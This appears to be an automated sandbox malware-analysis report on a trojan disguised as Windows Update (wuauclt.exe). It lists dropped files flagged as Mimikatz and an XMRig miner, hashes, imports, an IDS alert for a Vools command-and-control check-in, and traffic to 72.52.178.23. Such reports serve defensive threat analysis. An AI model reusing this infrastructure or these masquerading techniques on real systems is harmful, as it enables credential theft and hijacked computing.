                                              C:\Windows\NetworkDistribution\cnli-1.dll

                                              Download File
                                              Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):100864
                                              Entropy (8bit):6.5974034404211235
                                              Encrypted:false
                                              SSDEEP:3072:LrZL1wTcqmJ3QthbjsKXhoF3P3aTCLEA7HHxJPt:LN47aF3CTC37H
                                              MD5:A539D27F33EF16E52430D3D2E92E9D5C
                                              SHA1:F6D4F160705DC5A8A028BACA75B2601574925AC5
                                              SHA-256:DB0831E19A4E3A736EA7498DADC2D6702342F75FD8F7FBAE1894EE2E9738C2B4
                                              SHA-512:971C7D95F49F9E1AE636D96F53052CFC3DBDB734B4A3D386346BF03CA78D793EAEE18EFCAE2574B88FDEE5633270A24DB6C61AA0E170BCC6D11750DBD79AD0AF
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 75%, Browse
                                              • Antivirus: ReversingLabs, Detection: 96%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.w.............2Md.....2Mb.....2Mw.....2Mt.U...L..............2Mg..........................Rich............PE..L.....LO...........!.........|............... ............................................@..........................7..UM...*..d...............................X....................................%..@............ ...............................text...V........................... ..`.rdata..Ud... ...f..................@..@.data...l............x..............@....reloc...............|..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Windows\SysWOW64\FunctionProtocolHost.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\wuauclt.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):109056
                                              Entropy (8bit):6.177880655298613
                                              Encrypted:false
                                              SSDEEP:3072:A1eSFG0tXx+xcrH3tuI7Jdw6Lzw2biqqfjl0:A448SXtNxXcqIl0
                                              MD5:D228F4D6B772C764F2C6A539F2FC372D
                                              SHA1:F40CED80F6A11BDC46DC5EA54FBFD40549F5C9F2
                                              SHA-256:BF5D015CE8C0BEA1B91D81BD3AD0170729889AC4BD4B5AEC7FB45BD7BA27EC7D
                                              SHA-512:A132F777D05C16C3ADAC35D0ADB6828ECB323E56FBF00635DDE1AE11CD8A231C925F4CA2DBCE82C4E9D35744DFFD107AD2D7C3CF0C693897C57AAA7F5112266C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v..h2k.;2k.;2k.;..b;;k.;..`;@k.;..a;*k.;.t.;;k.;.2.: k.;.2.:.k.;.2.:"k.;;..;;k.;2k.;Ak.;.2.:<k.;.2.:3k.;.2l;3k.;.2.:3k.;Rich2k.;........PE..L.....\...........!................H`....................................................@..........................m..E...Hm..<...................................._..8............................`..@............................................text............................... ..`.rdata...e.......f..................@..@.data...D9.......0...b..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                              C:\Windows\SysWOW64\WUDHostServices.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\svchost.exe
                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):47104
                                              Entropy (8bit):5.32011324223062
                                              Encrypted:false
                                              SSDEEP:768:1QFj07RtFmEXoFVWp5U7HVqaLTen5VIvzF98Wk8YlLDVCeuxgQ1QRmBvU1tWlTh:1Qbi+e5UhRL6n5VIvzF98Wk8YlLDVCrr
                                              MD5:FC7880429D850789E40808D1AB45C119
                                              SHA1:9D6BB1BC89BAC653AE4D40107BBED6E07551D8EE
                                              SHA-256:C71623B62590E904E77F597B9F956A6F6A7B266206A75DDAC3FD91D86652E55D
                                              SHA-512:BAD391F5D0B014BFCB43015AC5E789E55B4492114516F09C4ECD1023470AD97AB824F929F4B9CE97DA56C55F7F94D82E0C9319488BDFD1E5B6834A8DA31525B4
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: hacktool_windows_mimikatz_copywrite, Description: Mimikatz credential dump tool: Author copywrite, Source: C:\Windows\SysWOW64\WUDHostServices.exe, Author: @fusionrace
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 33%, Browse
                                              • Antivirus: ReversingLabs, Detection: 69%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L!...@{O.@{O.@{O..O.@{On..O.@{O.O&O.@{O.8.O.@{O.c;O.@{O.cgO.@{O.@zO.@{O.cbO.@{O...O8@{O...O.@{O...O.@{ORich.@{O................PE..L.....\.................<...z...............P....@.......................................@............................................. .......................\....................................................P..p............................text...&;.......<.................. ..`.rdata...\...P...^...@..............@..@.data...,...........................@....rsrc... ...........................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................................................................

                                              C:\Windows\SysWOW64\dllhostex.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\svchost.exe
                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1360384
                                              Entropy (8bit):6.566380061247949
                                              Encrypted:false
                                              SSDEEP:24576:wOTuFoSUpzjLJrr4FtnILnSqmdoRdSeUSjguAF11N0i7TwONgV0HL1z9ChftQAgr:2oSUpzjLJYFtnILtmdoRdgSjguA30i7v
                                              MD5:D0C6EDC58729D88970CB9EE8A456457C
                                              SHA1:2825E2D9B840C2AD2EED281908F527253640F36E
                                              SHA-256:710A4F3F2EB31C33610B3A8C7F751B2258275DD324595E2AB4EAE2BE18EF7AC9
                                              SHA-512:7919D4E923AFD96FAADF8BDC192ECFE7E05D34BA832C703ACA707E125CE710C786E10FBDB3CFFF29000FCA82100972357B9CAFB3A571F20EB42DECC5295A9951
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 54%, Browse
                                              • Antivirus: ReversingLabs, Detection: 90%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........ahL.............d.......d..`....d......@........h.......h.......h.......d.......................h.......h...............h......Rich............................PE..L...m..\.............................=............@.......................................@.................................d...x....`.......................p......V......................PW.......V..@...............d............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc........`.......&..............@..@.reloc......p.......,..............@..B........................................................................................................................................................................................................................................................................

                                              C:\Windows\SysWOW64\msvcwme.log

                                              Download File
                                              Process:C:\Users\user\Desktop\wuauclt.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):7012537
                                              Entropy (8bit):7.998578830697322
                                              Encrypted:true
                                              SSDEEP:196608:U/jRO0gIK6THRglut4Skpg4Tfbu+g6rsvwue9iy:IgItHSSkpgKf6+g62wue9t
                                              MD5:2FFFB3077A386CD27259AC7A4957E1D6
                                              SHA1:022D49E632B2996E955D4EEBF360245C65A59093
                                              SHA-256:6790DF7AA6BC871DA4C62AF4DB9555DE3DE3B4813A0DF374B11F70DF81FBCCDB
                                              SHA-512:66AE49ED96D4AC304F05A5ED1F1D6AC1B021C02045FCD94DED3A3506C3EEF146DB835622133EB13BAA4B96799665ACDE98BE0F624B29F0D6DFC6C1F09A95AB5B
                                              Malicious:false
                                              Preview:0...........|.......9d030bb748da320eb4ca0b4b7e8b6b04............................x.}...!.....f.!.....f. C......j.-.W..\g.b.J>...\.I.....(P.....OG..2..X...a"@$.....8Y3 _./.-?#c}...].5.6Zb..h..u..WE..4.f.M..!..Q3.r.~`.....G..q.SX._sP......!a..M.Z.<-.&.M.z...r..!F3X...D.qH.!.`.~..6....w.Y5.R..Y*B=.....*.q.g.....H.........................e0c9b675c8c0bb43b467faab71bc94f5............................x...|...0>..$.,...\5.*...jd.&.hB.I.$l..K.I.".+*&;...q...-.i..}.y...m.ZEku.`6.@..(.OP..Q..$@`.s.......|.../|v..{.=..s.=..;7%?..9...i......p..?..qSf.5.{m..kv..._..........T......z.......c.......=.i....W.s..............W.....].v_..a..\7.....Y..s..fg...v#...m...5.c....cW...s.....Ons....~..=..{7.7...q.D..........d..q..`.V.E..c)L'p\"...\.I.*{.cb@......&.x.>...&../!.N...4......&+Mc....l...7..Y...O....W~l.;...~.]..8.{..W.}hl9.7.F.......8..?4./......nH3^..~|Q.....Y. .D.Q................)=Y..QD...d.c..G68..b.E.w.$...t...$....v.uD.....w..T..W.X.a.0..!..r..Y.W.#(.L..C..

                                              Static File Info

                                              General

                                              File type:PE32 executable (console) Intel 80386, for MS Windows
                                              Entropy (8bit):7.995613039742854
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:wuauclt.exe
                                              File size:7154917
                                              MD5:a5cc0738a563489458f6541c3d3dc722
                                              SHA1:c4647225139bfde320f51f7af5751c33930f3787
                                              SHA256:032f2e845d2b9832c7845bc6a7de650ee2148891c8ee442fe3f3a8478e588dbe
                                              SHA512:3239e0fedecb92738fed530822bbe5b49c011cd425f162c2032df068ce676cb6286b1d2eb3d7711d090e5014228d1cf021410ff7d3351e81acbf1d046ab02537
                                              SSDEEP:196608:WIQ9gu6aCQeL7fgzVwu4UN6KB3/0V61S+I:WIsp6axeLCIE6QyIvI
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................4@L.....4@N.....4@O.....h........|z.....e.......e.......e.......................r.......r.B.....r.......Rich...

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x407527
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows cui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x5C99CAE2 [Tue Mar 26 06:46:58 2019 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:1e13b98184e817c9666969f1c95dd10f

                                              Entrypoint Preview

                                              Instruction
                                              call 00007F0250A501BAh
                                              jmp 00007F0250A4FCDFh
                                              push ebp
                                              mov ebp, esp
                                              push ecx
                                              push esi
                                              push dword ptr [ebp+08h]
                                              mov esi, ecx
                                              mov dword ptr [ebp-04h], esi
                                              call 00007F0250A4FEC5h
                                              mov dword ptr [esi], 0041926Ch
                                              mov eax, esi
                                              pop esi
                                              mov esp, ebp
                                              pop ebp
                                              retn 0004h
                                              and dword ptr [ecx+04h], 00000000h
                                              mov eax, ecx
                                              and dword ptr [ecx+08h], 00000000h
                                              mov dword ptr [ecx+04h], 00419274h
                                              mov dword ptr [ecx], 0041926Ch
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              push ecx
                                              push esi
                                              push dword ptr [ebp+08h]
                                              mov esi, ecx
                                              mov dword ptr [ebp-04h], esi
                                              call 00007F0250A4FE8Ch
                                              mov dword ptr [esi], 00419288h
                                              mov eax, esi
                                              pop esi
                                              mov esp, ebp
                                              pop ebp
                                              retn 0004h
                                              and dword ptr [ecx+04h], 00000000h
                                              mov eax, ecx
                                              and dword ptr [ecx+08h], 00000000h
                                              mov dword ptr [ecx+04h], 00419290h
                                              mov dword ptr [ecx], 00419288h
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              push esi
                                              mov esi, ecx
                                              lea eax, dword ptr [esi+04h]
                                              mov dword ptr [esi], 0041924Ch
                                              and dword ptr [eax], 00000000h
                                              and dword ptr [eax+04h], 00000000h
                                              push eax
                                              mov eax, dword ptr [ebp+08h]
                                              add eax, 04h
                                              push eax
                                              call 00007F0250A51DD9h
                                              pop ecx
                                              pop ecx
                                              mov eax, esi
                                              pop esi
                                              pop ebp
                                              retn 0004h
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 0Ch
                                              lea ecx, dword ptr [ebp-0Ch]
                                              call 00007F0250A4FE13h
                                              push 0041F768h
                                              lea eax, dword ptr [ebp-0Ch]
                                              push eax
                                              call 00007F0250A51E36h
                                              int3
                                              mov eax, dword ptr [ecx+04h]

                                              Rich Headers

                                              Programming Language:
                                              • [ C ] VS98 (6.0) build 8168
                                              • [LNK] VS2015 build 23026
                                              • [RES] VS2015 build 23026
                                              • [IMP] VS2008 SP1 build 30729

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1fcc40x8c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x3b8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x250000x13bc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x1eef00x38.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1ef280x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x190000x1f8.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x170e50x17200False0.590329391892data6.67178289515IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata0x190000x77b80x7800False0.48349609375data5.3021293732IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x210000x2f4c0x2600False0.224403782895data2.72374569026IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .rsrc0x240000x3b80x400False0.4140625data3.18607830821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x250000x13bc0x1400False0.7955078125data6.54445825276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_VERSION0x240600x358dataEnglishUnited States

                                              Imports

                                              DLLImport
                                              KERNEL32.dllCreateProcessW, GetProcAddress, GetModuleFileNameA, FreeConsole, SetLastError, lstrlenA, lstrcatA, WaitForSingleObject, DecodePointer, CreateFileW, WriteConsoleW, GetModuleFileNameW, GetFileTime, GetTickCount, GetLastError, Sleep, ReleaseMutex, CreateMutexA, SetFileTime, DeleteFileA, GetSystemDirectoryA, CloseHandle, CreateFileA, WriteFile, GetFileSizeEx, ReadFile, LocalFree, LocalAlloc, lstrcpyA, SetFilePointerEx, HeapReAlloc, HeapSize, GetConsoleMode, GetConsoleCP, GetCurrentThreadId, FlushFileBuffers, GetProcessHeap, SetStdHandle, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, EncodePointer, RaiseException, RtlUnwind, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetStdHandle, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, GetACP, HeapFree, HeapAlloc, CompareStringW, LCMapStringW, GetFileType, GetStringTypeW, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP
                                              USER32.dllwsprintfA, wsprintfW
                                              ADVAPI32.dllSystemFunction036, CryptImportKey, CreateServiceA, StartServiceA, RegCloseKey, RegQueryValueExA, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, CloseServiceHandle, OpenSCManagerA, QueryServiceStatusEx, OpenServiceA, CryptVerifySignatureA, CryptAcquireContextA, CryptCreateHash, CryptHashData, CryptDestroyHash, CryptReleaseContext
                                              WS2_32.dllinet_ntoa, WSAStartup, gethostbyname, gethostname
                                              IPHLPAPI.DLLGetAdaptersInfo
                                              WININET.dllInternetCloseHandle, InternetOpenA, HttpSendRequestA, HttpOpenRequestA, HttpQueryInfoA, InternetConnectA, InternetReadFile, InternetSetOptionA

                                              Version Infos

                                              DescriptionData
                                              LegalCopyright Microsoft Corporation. All rights reserved.
                                              InternalNamewuauclt.exe
                                              FileVersion6.3.9600.16384
                                              CompanyNameMicrosoft Corporation
                                              ProductNameMicrosoft Windows Operating System
                                              ProductVersion6.3.9600.16384
                                              FileDescriptionWindows Update
                                              OriginalFilenamewuauclt.exe
                                              Translation0x0409 0x04b0

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              02/23/22-03:17:18.386658TCP2027470ET TROJAN Win32/Vools Variant CnC Checkin4976680192.168.2.472.52.178.23

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Feb 23, 2022 03:17:15.222446918 CET4976680192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:18.254724979 CET4976680192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:18.385173082 CET804976672.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:18.386214972 CET4976680192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:18.386657953 CET4976680192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:18.517343998 CET804976672.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:18.539530993 CET804976672.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:18.539585114 CET804976672.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:18.539668083 CET4976680192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:18.540169954 CET4976680192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:18.540333033 CET4976680192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:18.670720100 CET804976672.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:18.670820951 CET4976680192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:29.001214027 CET4976857084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:29.001280069 CET5708449768192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:29.505570889 CET4978653192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:29.552524090 CET4976857084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:29.552576065 CET5708449768192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:30.263654947 CET4976857084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:30.263716936 CET5708449768192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:32.552767038 CET4978653192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:32.684659004 CET534978672.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:33.255986929 CET4978653192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:33.387799978 CET534978672.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:37.166208982 CET4982357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:37.166260958 CET5708449823192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:37.740766048 CET4982357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:37.740827084 CET5708449823192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:38.350188971 CET4982357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:38.350236893 CET5708449823192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:39.262481928 CET4988153192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:39.397274017 CET534988172.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:39.949536085 CET4988153192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:40.084247112 CET534988172.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:40.756603003 CET4988153192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:40.891285896 CET534988172.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:48.830087900 CET4988357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:48.830142021 CET5708449883192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:49.351077080 CET4988357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:49.351123095 CET5708449883192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:49.944888115 CET4988357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:49.944942951 CET5708449883192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:50.256339073 CET4993553192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:50.382441044 CET534993572.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:50.949978113 CET4993553192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:51.075993061 CET534993572.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:51.759721041 CET4993553192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:51.885829926 CET534993572.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:57.150542021 CET4993953192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:57.277319908 CET534993972.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:57.469669104 CET4994157084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:57.469719887 CET5708449941192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:57.851804972 CET4993953192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:57.981894970 CET534993972.52.178.23192.168.2.4
                                              Feb 23, 2022 03:17:58.054915905 CET4994157084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:58.054964066 CET5708449941192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:58.555022001 CET4993953192.168.2.472.52.178.23
                                              Feb 23, 2022 03:17:58.555531979 CET4994157084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:17:58.555571079 CET5708449941192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:17:58.681735992 CET534993972.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:04.178405046 CET5000653192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:04.312063932 CET535000672.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:04.947673082 CET5000653192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:05.080674887 CET535000672.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:05.758737087 CET5000653192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:05.891964912 CET535000672.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:11.770174026 CET5000753192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:11.903254986 CET535000772.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:12.311455965 CET5000957084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:12.311507940 CET5708450009192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:12.531241894 CET5000753192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:12.663955927 CET535000772.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:12.947551012 CET5000957084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:12.947597027 CET5708450009192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:13.243762016 CET5000753192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:13.376729965 CET535000772.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:13.557624102 CET5000957084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:13.557683945 CET5708450009192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:20.302525997 CET5006753192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:20.431477070 CET535006772.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:20.947608948 CET5006753192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:21.076937914 CET535006772.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:21.760030031 CET5006753192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:21.888803959 CET535006772.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:27.652820110 CET5006957084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:27.652868032 CET5708450069192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:28.225219965 CET5009453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:28.262130976 CET5006957084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:28.262198925 CET5708450069192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:28.354655981 CET535009472.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:28.948153973 CET5009453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:28.948203087 CET5006957084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:28.948260069 CET5708450069192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:29.077429056 CET535009472.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:29.760965109 CET5009453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:29.890969038 CET535009472.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:35.967782021 CET5012153192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:36.094007015 CET535012172.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:36.745683908 CET5012153192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:36.871885061 CET535012172.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:37.558223009 CET5012153192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:37.684542894 CET535012172.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:38.221967936 CET5012357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:38.221993923 CET5708450123192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:38.761434078 CET5012357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:38.761467934 CET5708450123192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:39.261511087 CET5012357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:39.261568069 CET5708450123192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:43.239773989 CET5018353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:43.372785091 CET535018372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:43.949393988 CET5018353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:44.082814932 CET535018372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:44.762001991 CET5018353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:44.895092010 CET535018372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:47.372736931 CET5018557084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:47.372792959 CET5708450185192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:48.050718069 CET5018557084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:48.050770044 CET5708450185192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:48.559534073 CET5018557084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:48.559581041 CET5708450185192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:50.304271936 CET5024353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:50.435965061 CET535024372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:50.949945927 CET5024353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:51.081692934 CET535024372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:51.762614012 CET5024353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:51.894412041 CET535024372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:57.762026072 CET5024453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:57.893071890 CET535024472.52.178.23192.168.2.4
